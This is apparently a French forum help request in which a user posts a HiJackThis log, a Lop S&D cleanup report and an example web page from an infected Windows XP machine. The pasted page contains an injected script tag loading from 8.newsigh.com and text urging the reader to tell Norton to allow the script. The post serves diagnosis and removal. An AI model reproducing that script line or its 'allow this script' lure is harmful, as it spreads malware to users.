C:\WINDOWS\system32\drivers\CDAC11BA.EXE
C:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\WINDOWS\system32\beidservicecrl.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Sunbelt Software\Personal Firewall 4\kpf4ss.exe
C:\Program Files\CA\SharedComponents\CA_LIC\LogWatNT.exe
C:\Program Files\Fichiers communs\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Sunbelt Software\Personal Firewall 4\kpf4gui.exe
C:\Program Files\Belgacom\bin\sprtsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\Program Files\Sunbelt Software\Personal Firewall 4\kpf4gui.exe
C:\WINDOWS\CNYHKey.exe
C:\WINDOWS\mHotkey.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
C:\PROGRA~1\SYMANT~1\VPTray.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Sony\Content Transfer\ContentTransferWMDetector.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Belgacom\bin\sprtcmd.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\SEC\Natural Color Pro\NCProTray.exe
C:\Program Files\Java\jre6\bin\jqsnotify.exe
C:\Program Files\Java\jre6\bin\jqsnotify.exe
C:\Program Files\Outlook Express\msimn.exe
C:\Program Files\Java\jre6\bin\jqsnotify.exe
C:\Program Files\ Firefox\firefox.exe
C:\Program Files\Java\jre6\bin\jqsnotify.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Documents and Settings\Michel\Bureau\Securité\HiJackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.proximus.be/pickx
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Aide pour le lien d'Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Solid Converter PDF - {259F616C-A300-44F5-B04A-ED001A26C85C} - C:\Program Files\SolidDocuments\SolidConverterPDF\SCPDF\ExploreExtPDF.dll
O2 - BHO: Winamp Toolbar BHO - {25CEE8EC-5730-41bc-8B58-22DDC8AB8C20} - C:\Program Files\Winamp Toolbar\winamptb.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Solid Converter PDF - {259F616C-A300-44F5-B04A-ED001A26C85C} - C:\Program Files\SolidDocuments\SolidConverterPDF\SCPDF\ExploreExtPDF.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: Winamp Toolbar - {EBF2BA02-9094-4c5a-858B-BB198F3D8DE2} - C:\Program Files\Winamp Toolbar\winamptb.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [Raccourci vers la page des propriétés de High Definition Audio] HDAudPropShortcut.exe
O4 - HKLM\..\Run: [ledpointer] CNYHKey.exe
O4 - HKLM\..\Run: [CHotkey] mHotkey.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [CanonSolutionMenu] C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe /logon
O4 - HKLM\..\Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [ContentTransferWMDetector.exe] C:\Program Files\Sony\Content Transfer\ContentTransferWMDetector.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Belgacom] "C:\Program Files\Belgacom\bin\sprtcmd.exe" /P Belgacom
O4 - HKLM\..\Run: [xoabic] C:\WINDOWS\system32\xoabic.exe \u
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: NCProTray.lnk = ?
O8 - Extra context menu item: &Winamp Toolbar Search - C:\Documents and Settings\All Users\Application Data\Winamp Toolbar\ieToolbar\resources\en-US\local\search.html
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\WINDOWS\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: E&xporteren naar Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office12\EXCEL.EXE/3000
O9 - Extra button: Verzenden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Verz&enden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {B205A35E-1FC4-4CE3-818B-899DBBB3388C} - C:\Program Files\Fichiers communs\Microsoft Shared\Encarta Search Bar\ENCSBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra button: (no name) - SolidConverterPDF - (no file) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\846umtqvwes4.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\846umtqvwes4.dll
O15 - Trusted Zone: *.musicmatch.com
O15 - Trusted Zone: *.musicmatch.com (HKLM)
O16 - DPF: {1F2F4C9E-6F09-47BC-970D-3C54734667FE} (LSSupCtl Class) - https://support.norton.com/sp/en/us/home/current/info
O16 - DPF: {4D7F48C0-CB49-4EA6-97D4-04F4EACC2F3B} - http://sib1.od2.com/common/Member/ClientInstall/10.20.0002/OCI/setup.exe
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://by10fd.bay10.hotmail.msn.com/resources/MsnPUpld.cab
O16 - DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} (Image Uploader Control) - http://belgacom.extrafilm.be/ImageUploader5.cab
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://www.bitdefender.fr/scan_fr/scan8/oscan8.cab
O16 - DPF: {62475759-9E84-458E-A1AB-5D2C442ADFDE} - http://a1540.g.akamai.net/7/1540/52/20041101/qtinstall.info.apple.com/pthalo/fr/win/QuickTimeInstaller.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1097702632093
O16 - DPF: {6E5E167B-1566-4316-B27F-0DDAB3484CF7} (Image Uploader Control) - http://wisup.net/_plateforme/Upload/Aurigma/AurigmaActiveX/ImageUploader4.cab
O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www3.ca.com/securityadvisor/virusinfo/webscan.cab
O16 - DPF: {A73BAEFA-EE65-494D-BEDB-DD3E5A34FA98} (Image Uploader) - http://scarlet.extrafilm.be/ImageUploader4.cab
O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://www.crucial.com/controls/cpcScanner.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/msnmessengersetupdownloader.cab
O16 - DPF: {BE833F39-1E0C-468C-BA70-25AAEE55775E} (System Requirements Lab) - http://www.systemrequirementslab.com/sysreqlab.cab
O16 - DPF: {C45B1500-7B63-47C2-AB25-C28CB46AFDEE} (OD2 Music Manager) - http://sib1.od2.com/common/musicmanager/installation/MusicManagerPlugin.CAB
O16 - DPF: {CE28D5D2-60CF-4C7D-9FE8-0F47A3308078} (ActiveDataInfo Class) - https://support.norton.com/sp/en/us/home/current/info
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} (McFreeScan Class) - http://download.mcafee.com/molbin/iss-loc/mcfscan/2,1,0,4810/mcfscan.cab
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Service Bonjour (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Boonty Games - BOONTY - C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe
O23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\system32\drivers\CDAC11BA.EXE
O23 - Service: Serveur de licence CA (CA_LIC_SRVR) - Computer Associates - C:\Program Files\CA\SharedComponents\CA_LIC\lic98rmtd.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\ccSetMgr.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - C:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: eID CRL Service - Zetes - C:\WINDOWS\system32\beidservicecrl.exe
O23 - Service: eID Privacy Service - Zetes - C:\WINDOWS\system32\beidservicepcsc.exe
O23 - Service: FreezeScreenSaver - Unknown owner - C:\WINDOWS\system32\FreezeScreenSaver.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: PIXMA Extended Survey Program (IJPLMSVC) - Unknown owner - C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE
O23 - Service: Service de l’iPod (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Sunbelt Kerio Personal Firewall 4 (KPF4) - Sunbelt Software - C:\Program Files\Sunbelt Software\Personal Firewall 4\kpf4ss.exe
O23 - Service: Event Log Watch (LogWatch) - Computer Associates - C:\Program Files\CA\SharedComponents\CA_LIC\LogWatNT.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: SAVRoam (SavRoam) - symantec - C:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\SPBBC\SPBBCSvc.exe
O23 - Service: SupportSoft Sprocket Service (belgacom) (sprtsvc_belgacom) - SupportSoft, Inc. - C:\Program Files\Belgacom\bin\sprtsvc.exe
O23 - Service: SupportSoft RemoteAssist - SupportSoft, Inc. - C:\Program Files\Fichiers communs\Supportsoft\bin\ssrc.exe
O23 - Service: Symantec AntiVirus - Symantec Corporation - C:\Program Files\Symantec AntiVirus\Rtvscan.exe
O23 - Service: X10 Device Network Service (x10nets) - X10 - C:\PROGRA~1\COMMON~1\X10\Common\x10nets.exe
J'ai fais deux tentatives et le phénomène revient.
Après 5 à dix minutes de surf a une vitesse normale, firefox ralentit et le site 8.newsigh.com est inséré dans toutes les pages voir exemple.
merci de votre aide
Michel
Exemple
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >
<head><link rel="shortcut icon" href="../icon_genproc.ico" />
<title>AV Norton</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link rel="stylesheet" media="screen" type="text/css" title="design" href="design.css" />
</head>
<body><script src="http://8.newsigh.com/popup.php?data=1d000000524b98bee08db0603cfb3e7c65530ac7fe87476ffada0d1ac7ff6e13865d7854cebb36a89a36af415664793b4cf66161256bc1861e0ec43df0bfdec8e11cdc01d1c1e796ecc6b162774b39fdf3d036c52fe00e267de5f12050aa91dcb18c9ef435316168a67a65c4c98ab46d68da292dbc57aa07ada1c167bce418980369fda3"></script>
<h1>Voici comment autoriser le script :</h1>
<br />
<br />
<br />
<br />
<p>
Si norton vous demande comment réagir lors de l'exécution de GenProc, bien sélectionner<br />
<em>"<strong>autoriser ce script</strong>"</em> et valider.
</p>
<br />
<br />
<center> <img src="img.PNG" /></center>
</body>
</html>
rapport LOPR
--------------------\\ Lop S&D 4.2.5-0 XP/Vista
Microsoft Windows XP Édition familiale ( v5.1.2600 ) Service Pack 3
X86-based PC ( Multiprocessor Free : Intel(R) Pentium(R) 4 CPU 3.40GHz )
BIOS : Phoenix - AwardBIOS v6.00PG
USER : Michel ( Administrator )
BOOT : Fail-safe boot
Antivirus : Symantec AntiVirus Corporate Edition 10.0.1.1000 (Activated)
Firewall : Kerio Personal Firewall 4.2.3 T (Activated)
C:\ (Local Disk) - NTFS - Total:125 Go (Free:35 Go)
D:\ (Local Disk) - NTFS - Total:89 Go (Free:69 Go)
E:\ (Local Disk) - FAT32 - Total:17 Go (Free:13 Go)
F:\ (Local Disk) - NTFS - Total:146 Go (Free:48 Go)
G:\ (Local Disk) - NTFS - Total:151 Go (Free:36 Go)
H:\ (CD or DVD)
I:\ (CD or DVD)
J:\ (USB)
K:\ (USB)
L:\ (USB)
"C:\Lop SD" ( MAJ : 19-12-2008|23:40 )
Option : [2] ( dim. 27/09/2009|23:17 )
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ SUPPRESSION
Supprime! - C:\WINDOWS\Tasks\AFEA01B7919DB2F7.job
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@advertstream[2].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@totallybaby.advertserve[1].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@adultfriendfinder[2].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@adultfriendfinder[3].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@adopt.euroclick[1].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@2xmoinscher[2].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@planeteachat.2xmoinscher[1].txt
Supprime! - C:\DOCUME~1\Michel\Cookies\michel@www.2xmoinscher[1].txt
Supprime! - C:\DOCUME~1\Michel\APPLIC~1\online~1
Supprime! - C:\Program Files\online~1
-
[ Fichier Hosts ] .. Restaure!
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
--------------------\\ Listing des dossiers dans APPLIC~1
[25/10/2004|08:06] C:\DOCUME~1\ADMINI~1\APPLIC~1\CyberLink
[13/10/2004|21:26] C:\DOCUME~1\ADMINI~1\APPLIC~1\Identities
[14/10/2004|09:30] C:\DOCUME~1\ADMINI~1\APPLIC~1\Macromedia
[12/11/2004|15:05] C:\DOCUME~1\ADMINI~1\APPLIC~1\Microsoft
[14/10/2004|09:43] C:\DOCUME~1\ADMINI~1\APPLIC~1\Real
[14/10/2004|11:36] C:\DOCUME~1\ADMINI~1\APPLIC~1\Sun
[07/11/2008|23:24] C:\DOCUME~1\ALLUSE~1\APPLIC~1\{3276BE95_AF08_429F_A64F_CA64CB79BCF6}
[20/04/2009|21:13] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe
[14/10/2004|09:51] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Ahead
[07/11/2008|23:21] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Apple
[07/11/2008|23:22] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Apple Computer
[26/02/2006|14:42] C:\DOCUME~1\ALLUSE~1\APPLIC~1\BOONTY
[19/07/2008|11:44] C:\DOCUME~1\ALLUSE~1\APPLIC~1\CanonBJ
[19/07/2009|08:59] C:\DOCUME~1\ALLUSE~1\APPLIC~1\CanonIJPLM
[01/12/2006|23:58] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Comodo
[24/10/2004|19:38] C:\DOCUME~1\ALLUSE~1\APPLIC~1\CyberLink
[17/03/2009|23:40] C:\DOCUME~1\ALLUSE~1\APPLIC~1\DVD Shrink
[18/04/2009|22:58] C:\DOCUME~1\ALLUSE~1\APPLIC~1\GARMIN
[14/04/2006|15:55] C:\DOCUME~1\ALLUSE~1\APPLIC~1\InstallShield
[26/11/2004|02:52] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Kazaa Lite
[14/06/2008|12:17] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Lavasoft
[18/02/2006|15:15] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Love Clock Mapi Bend
[18/03/2005|23:40] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Macrovision
[24/09/2009|22:01] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Malwarebytes
[26/10/2005|19:46] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Messenger Plus!
[18/10/2008|17:34] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Microsoft
[11/09/2009|00:12] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Microsoft Help
[24/10/2004|19:29] C:\DOCUME~1\ALLUSE~1\APPLIC~1\muvee Technologies
[03/02/2005|21:00] C:\DOCUME~1\ALLUSE~1\APPLIC~1\My Pictures
[17/01/2005|16:39] C:\DOCUME~1\ALLUSE~1\APPLIC~1\NFS Underground
[14/10/2004|11:38] C:\DOCUME~1\ALLUSE~1\APPLIC~1\nView_Profiles
[10/04/2005|22:36] C:\DOCUME~1\ALLUSE~1\APPLIC~1\OD2
[26/03/2007|21:52] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Office Genuine Advantage
[21/10/2007|22:29] C:\DOCUME~1\ALLUSE~1\APPLIC~1\OrbNetworks
[06/12/2004|05:48] C:\DOCUME~1\ALLUSE~1\APPLIC~1\QuickTime
[21/05/2005|16:02] C:\DOCUME~1\ALLUSE~1\APPLIC~1\River Past G2
[05/08/2005|19:42] C:\DOCUME~1\ALLUSE~1\APPLIC~1\River Past G3
[23/10/2006|19:06] C:\DOCUME~1\ALLUSE~1\APPLIC~1\River Past G4
[13/10/2004|22:10] C:\DOCUME~1\ALLUSE~1\APPLIC~1\SBSI
[18/10/2008|13:18] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Skype
[03/02/2005|21:00] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Sony Ericsson
[23/09/2009|16:39] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Spybot - Search & Destroy
[25/11/2004|21:32] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Support.com
[02/12/2006|14:44] C:\DOCUME~1\ALLUSE~1\APPLIC~1\SupportSoft
[18/02/2006|12:46] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Symantec
[16/03/2009|21:58] C:\DOCUME~1\ALLUSE~1\APPLIC~1\vsosdk
[21/10/2007|22:29] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Winamp Toolbar
[19/08/2005|09:37] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Windows Genuine Advantage
[17/06/2005|19:29] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Xceed Software
[18/03/2007|17:42] C:\DOCUME~1\ALLUSE~1\APPLIC~1\Yahoo! Companion
[21/07/2009|22:47] C:\DOCUME~1\ALLUSE~1\APPLIC~1\ZoomBrowser
[25/10/2004|08:06] C:\DOCUME~1\DEFAUL~1\APPLIC~1\CyberLink
[13/10/2004|21:26] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Identities
[14/10/2004|09:30] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Macromedia
[12/11/2004|15:05] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Microsoft
[14/10/2004|09:43] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Real
[14/10/2004|11:36] C:\DOCUME~1\DEFAUL~1\APPLIC~1\Sun
[25/07/2008|22:09] C:\DOCUME~1\LOCALS~1\APPLIC~1\Microsoft
[07/01/2006|12:37] C:\DOCUME~1\LOCALS~1\APPLIC~1\OD2
[24/09/2009|21:26] C:\DOCUME~1\LOCALS~1\APPLIC~1\SolidDocuments
[24/10/2004|20:04] C:\DOCUME~1\LOCALS~1\APPLIC~1\X10 Commander
[27/03/2005|14:05] C:\DOCUME~1\Michel\APPLIC~1\Absolutist.com
[26/12/2004|13:50] C:\DOCUME~1\Michel\APPLIC~1\Active Disk
[27/06/2007|21:50] C:\DOCUME~1\Michel\APPLIC~1\Adobe
[22/01/2007|22:27] C:\DOCUME~1\Michel\APPLIC~1\AdobeUM
[09/10/2007|00:21] C:\DOCUME~1\Michel\APPLIC~1\Ahead
[28/01/2006|21:58] C:\DOCUME~1\Michel\APPLIC~1\Apple Computer
[27/01/2008|18:27] C:\DOCUME~1\Michel\APPLIC~1\Ariane Software
[24/03/2007|17:19] C:\DOCUME~1\Michel\APPLIC~1\AVSMedia
[08/06/2008|20:21] C:\DOCUME~1\Michel\APPLIC~1\beid-cache
[11/12/2004|23:57] C:\DOCUME~1\Michel\APPLIC~1\BVS Solitaire Collection
[26/12/2007|17:36] C:\DOCUME~1\Michel\APPLIC~1\Canon
[19/07/2008|13:11] C:\DOCUME~1\Michel\APPLIC~1\CD-LabelPrint
[01/12/2006|23:58] C:\DOCUME~1\Michel\APPLIC~1\Comodo
[14/04/2006|15:55] C:\DOCUME~1\Michel\APPLIC~1\Corel
[11/12/2005|21:28] C:\DOCUME~1\Michel\APPLIC~1\CyberLink
[09/01/2009|22:59] C:\DOCUME~1\Michel\APPLIC~1\DivX
[20/09/2009|15:58] C:\DOCUME~1\Michel\APPLIC~1\dvdcss
[16/03/2009|23:00] C:\DOCUME~1\Michel\APPLIC~1\DVDFab
[29/08/2008|22:50] C:\DOCUME~1\Michel\APPLIC~1\FileZilla
[15/09/2009|18:25] C:\DOCUME~1\Michel\APPLIC~1\foobar2000
[18/04/2009|22:58] C:\DOCUME~1\Michel\APPLIC~1\GARMIN
[29/12/2007|16:02] C:\DOCUME~1\Michel\APPLIC~1\gtk-2.0
[28/11/2004|23:01] C:\DOCUME~1\Michel\APPLIC~1\Help
[08/01/2005|11:33] C:\DOCUME~1\Michel\APPLIC~1\Identities
[20/07/2007|20:17] C:\DOCUME~1\Michel\APPLIC~1\InstallShield
[26/11/2004|02:39] C:\DOCUME~1\Michel\APPLIC~1\Kazaa Lite
[22/01/2005|19:07] C:\DOCUME~1\Michel\APPLIC~1\La Bataille pour la Terre du Milieu
[14/06/2008|12:16] C:\DOCUME~1\Michel\APPLIC~1\Lavasoft
[30/12/2004|01:08] C:\DOCUME~1\Michel\APPLIC~1\Leadertech
[14/10/2004|09:30] C:\DOCUME~1\Michel\APPLIC~1\Macromedia
[24/09/2009|22:01] C:\DOCUME~1\Michel\APPLIC~1\Malwarebytes
[09/01/2009|22:17] C:\DOCUME~1\Michel\APPLIC~1\Media Player Classic
[18/02/2006|15:13] C:\DOCUME~1\Michel\APPLIC~1\MEDIAAMEN
[11/07/2009|17:55] C:\DOCUME~1\Michel\APPLIC~1\Microsoft
[23/09/2009|21:39] C:\DOCUME~1\Michel\APPLIC~1\Mozilla
[12/03/2005|15:45] C:\DOCUME~1\Michel\APPLIC~1\Neo-Modus.com
[10/04/2005|22:31] C:\DOCUME~1\Michel\APPLIC~1\OD2
[24/02/2009|00:24] C:\DOCUME~1\Michel\APPLIC~1\OfficeUpdate12
[02/04/2005|16:51] C:\DOCUME~1\Michel\APPLIC~1\Publish Providers
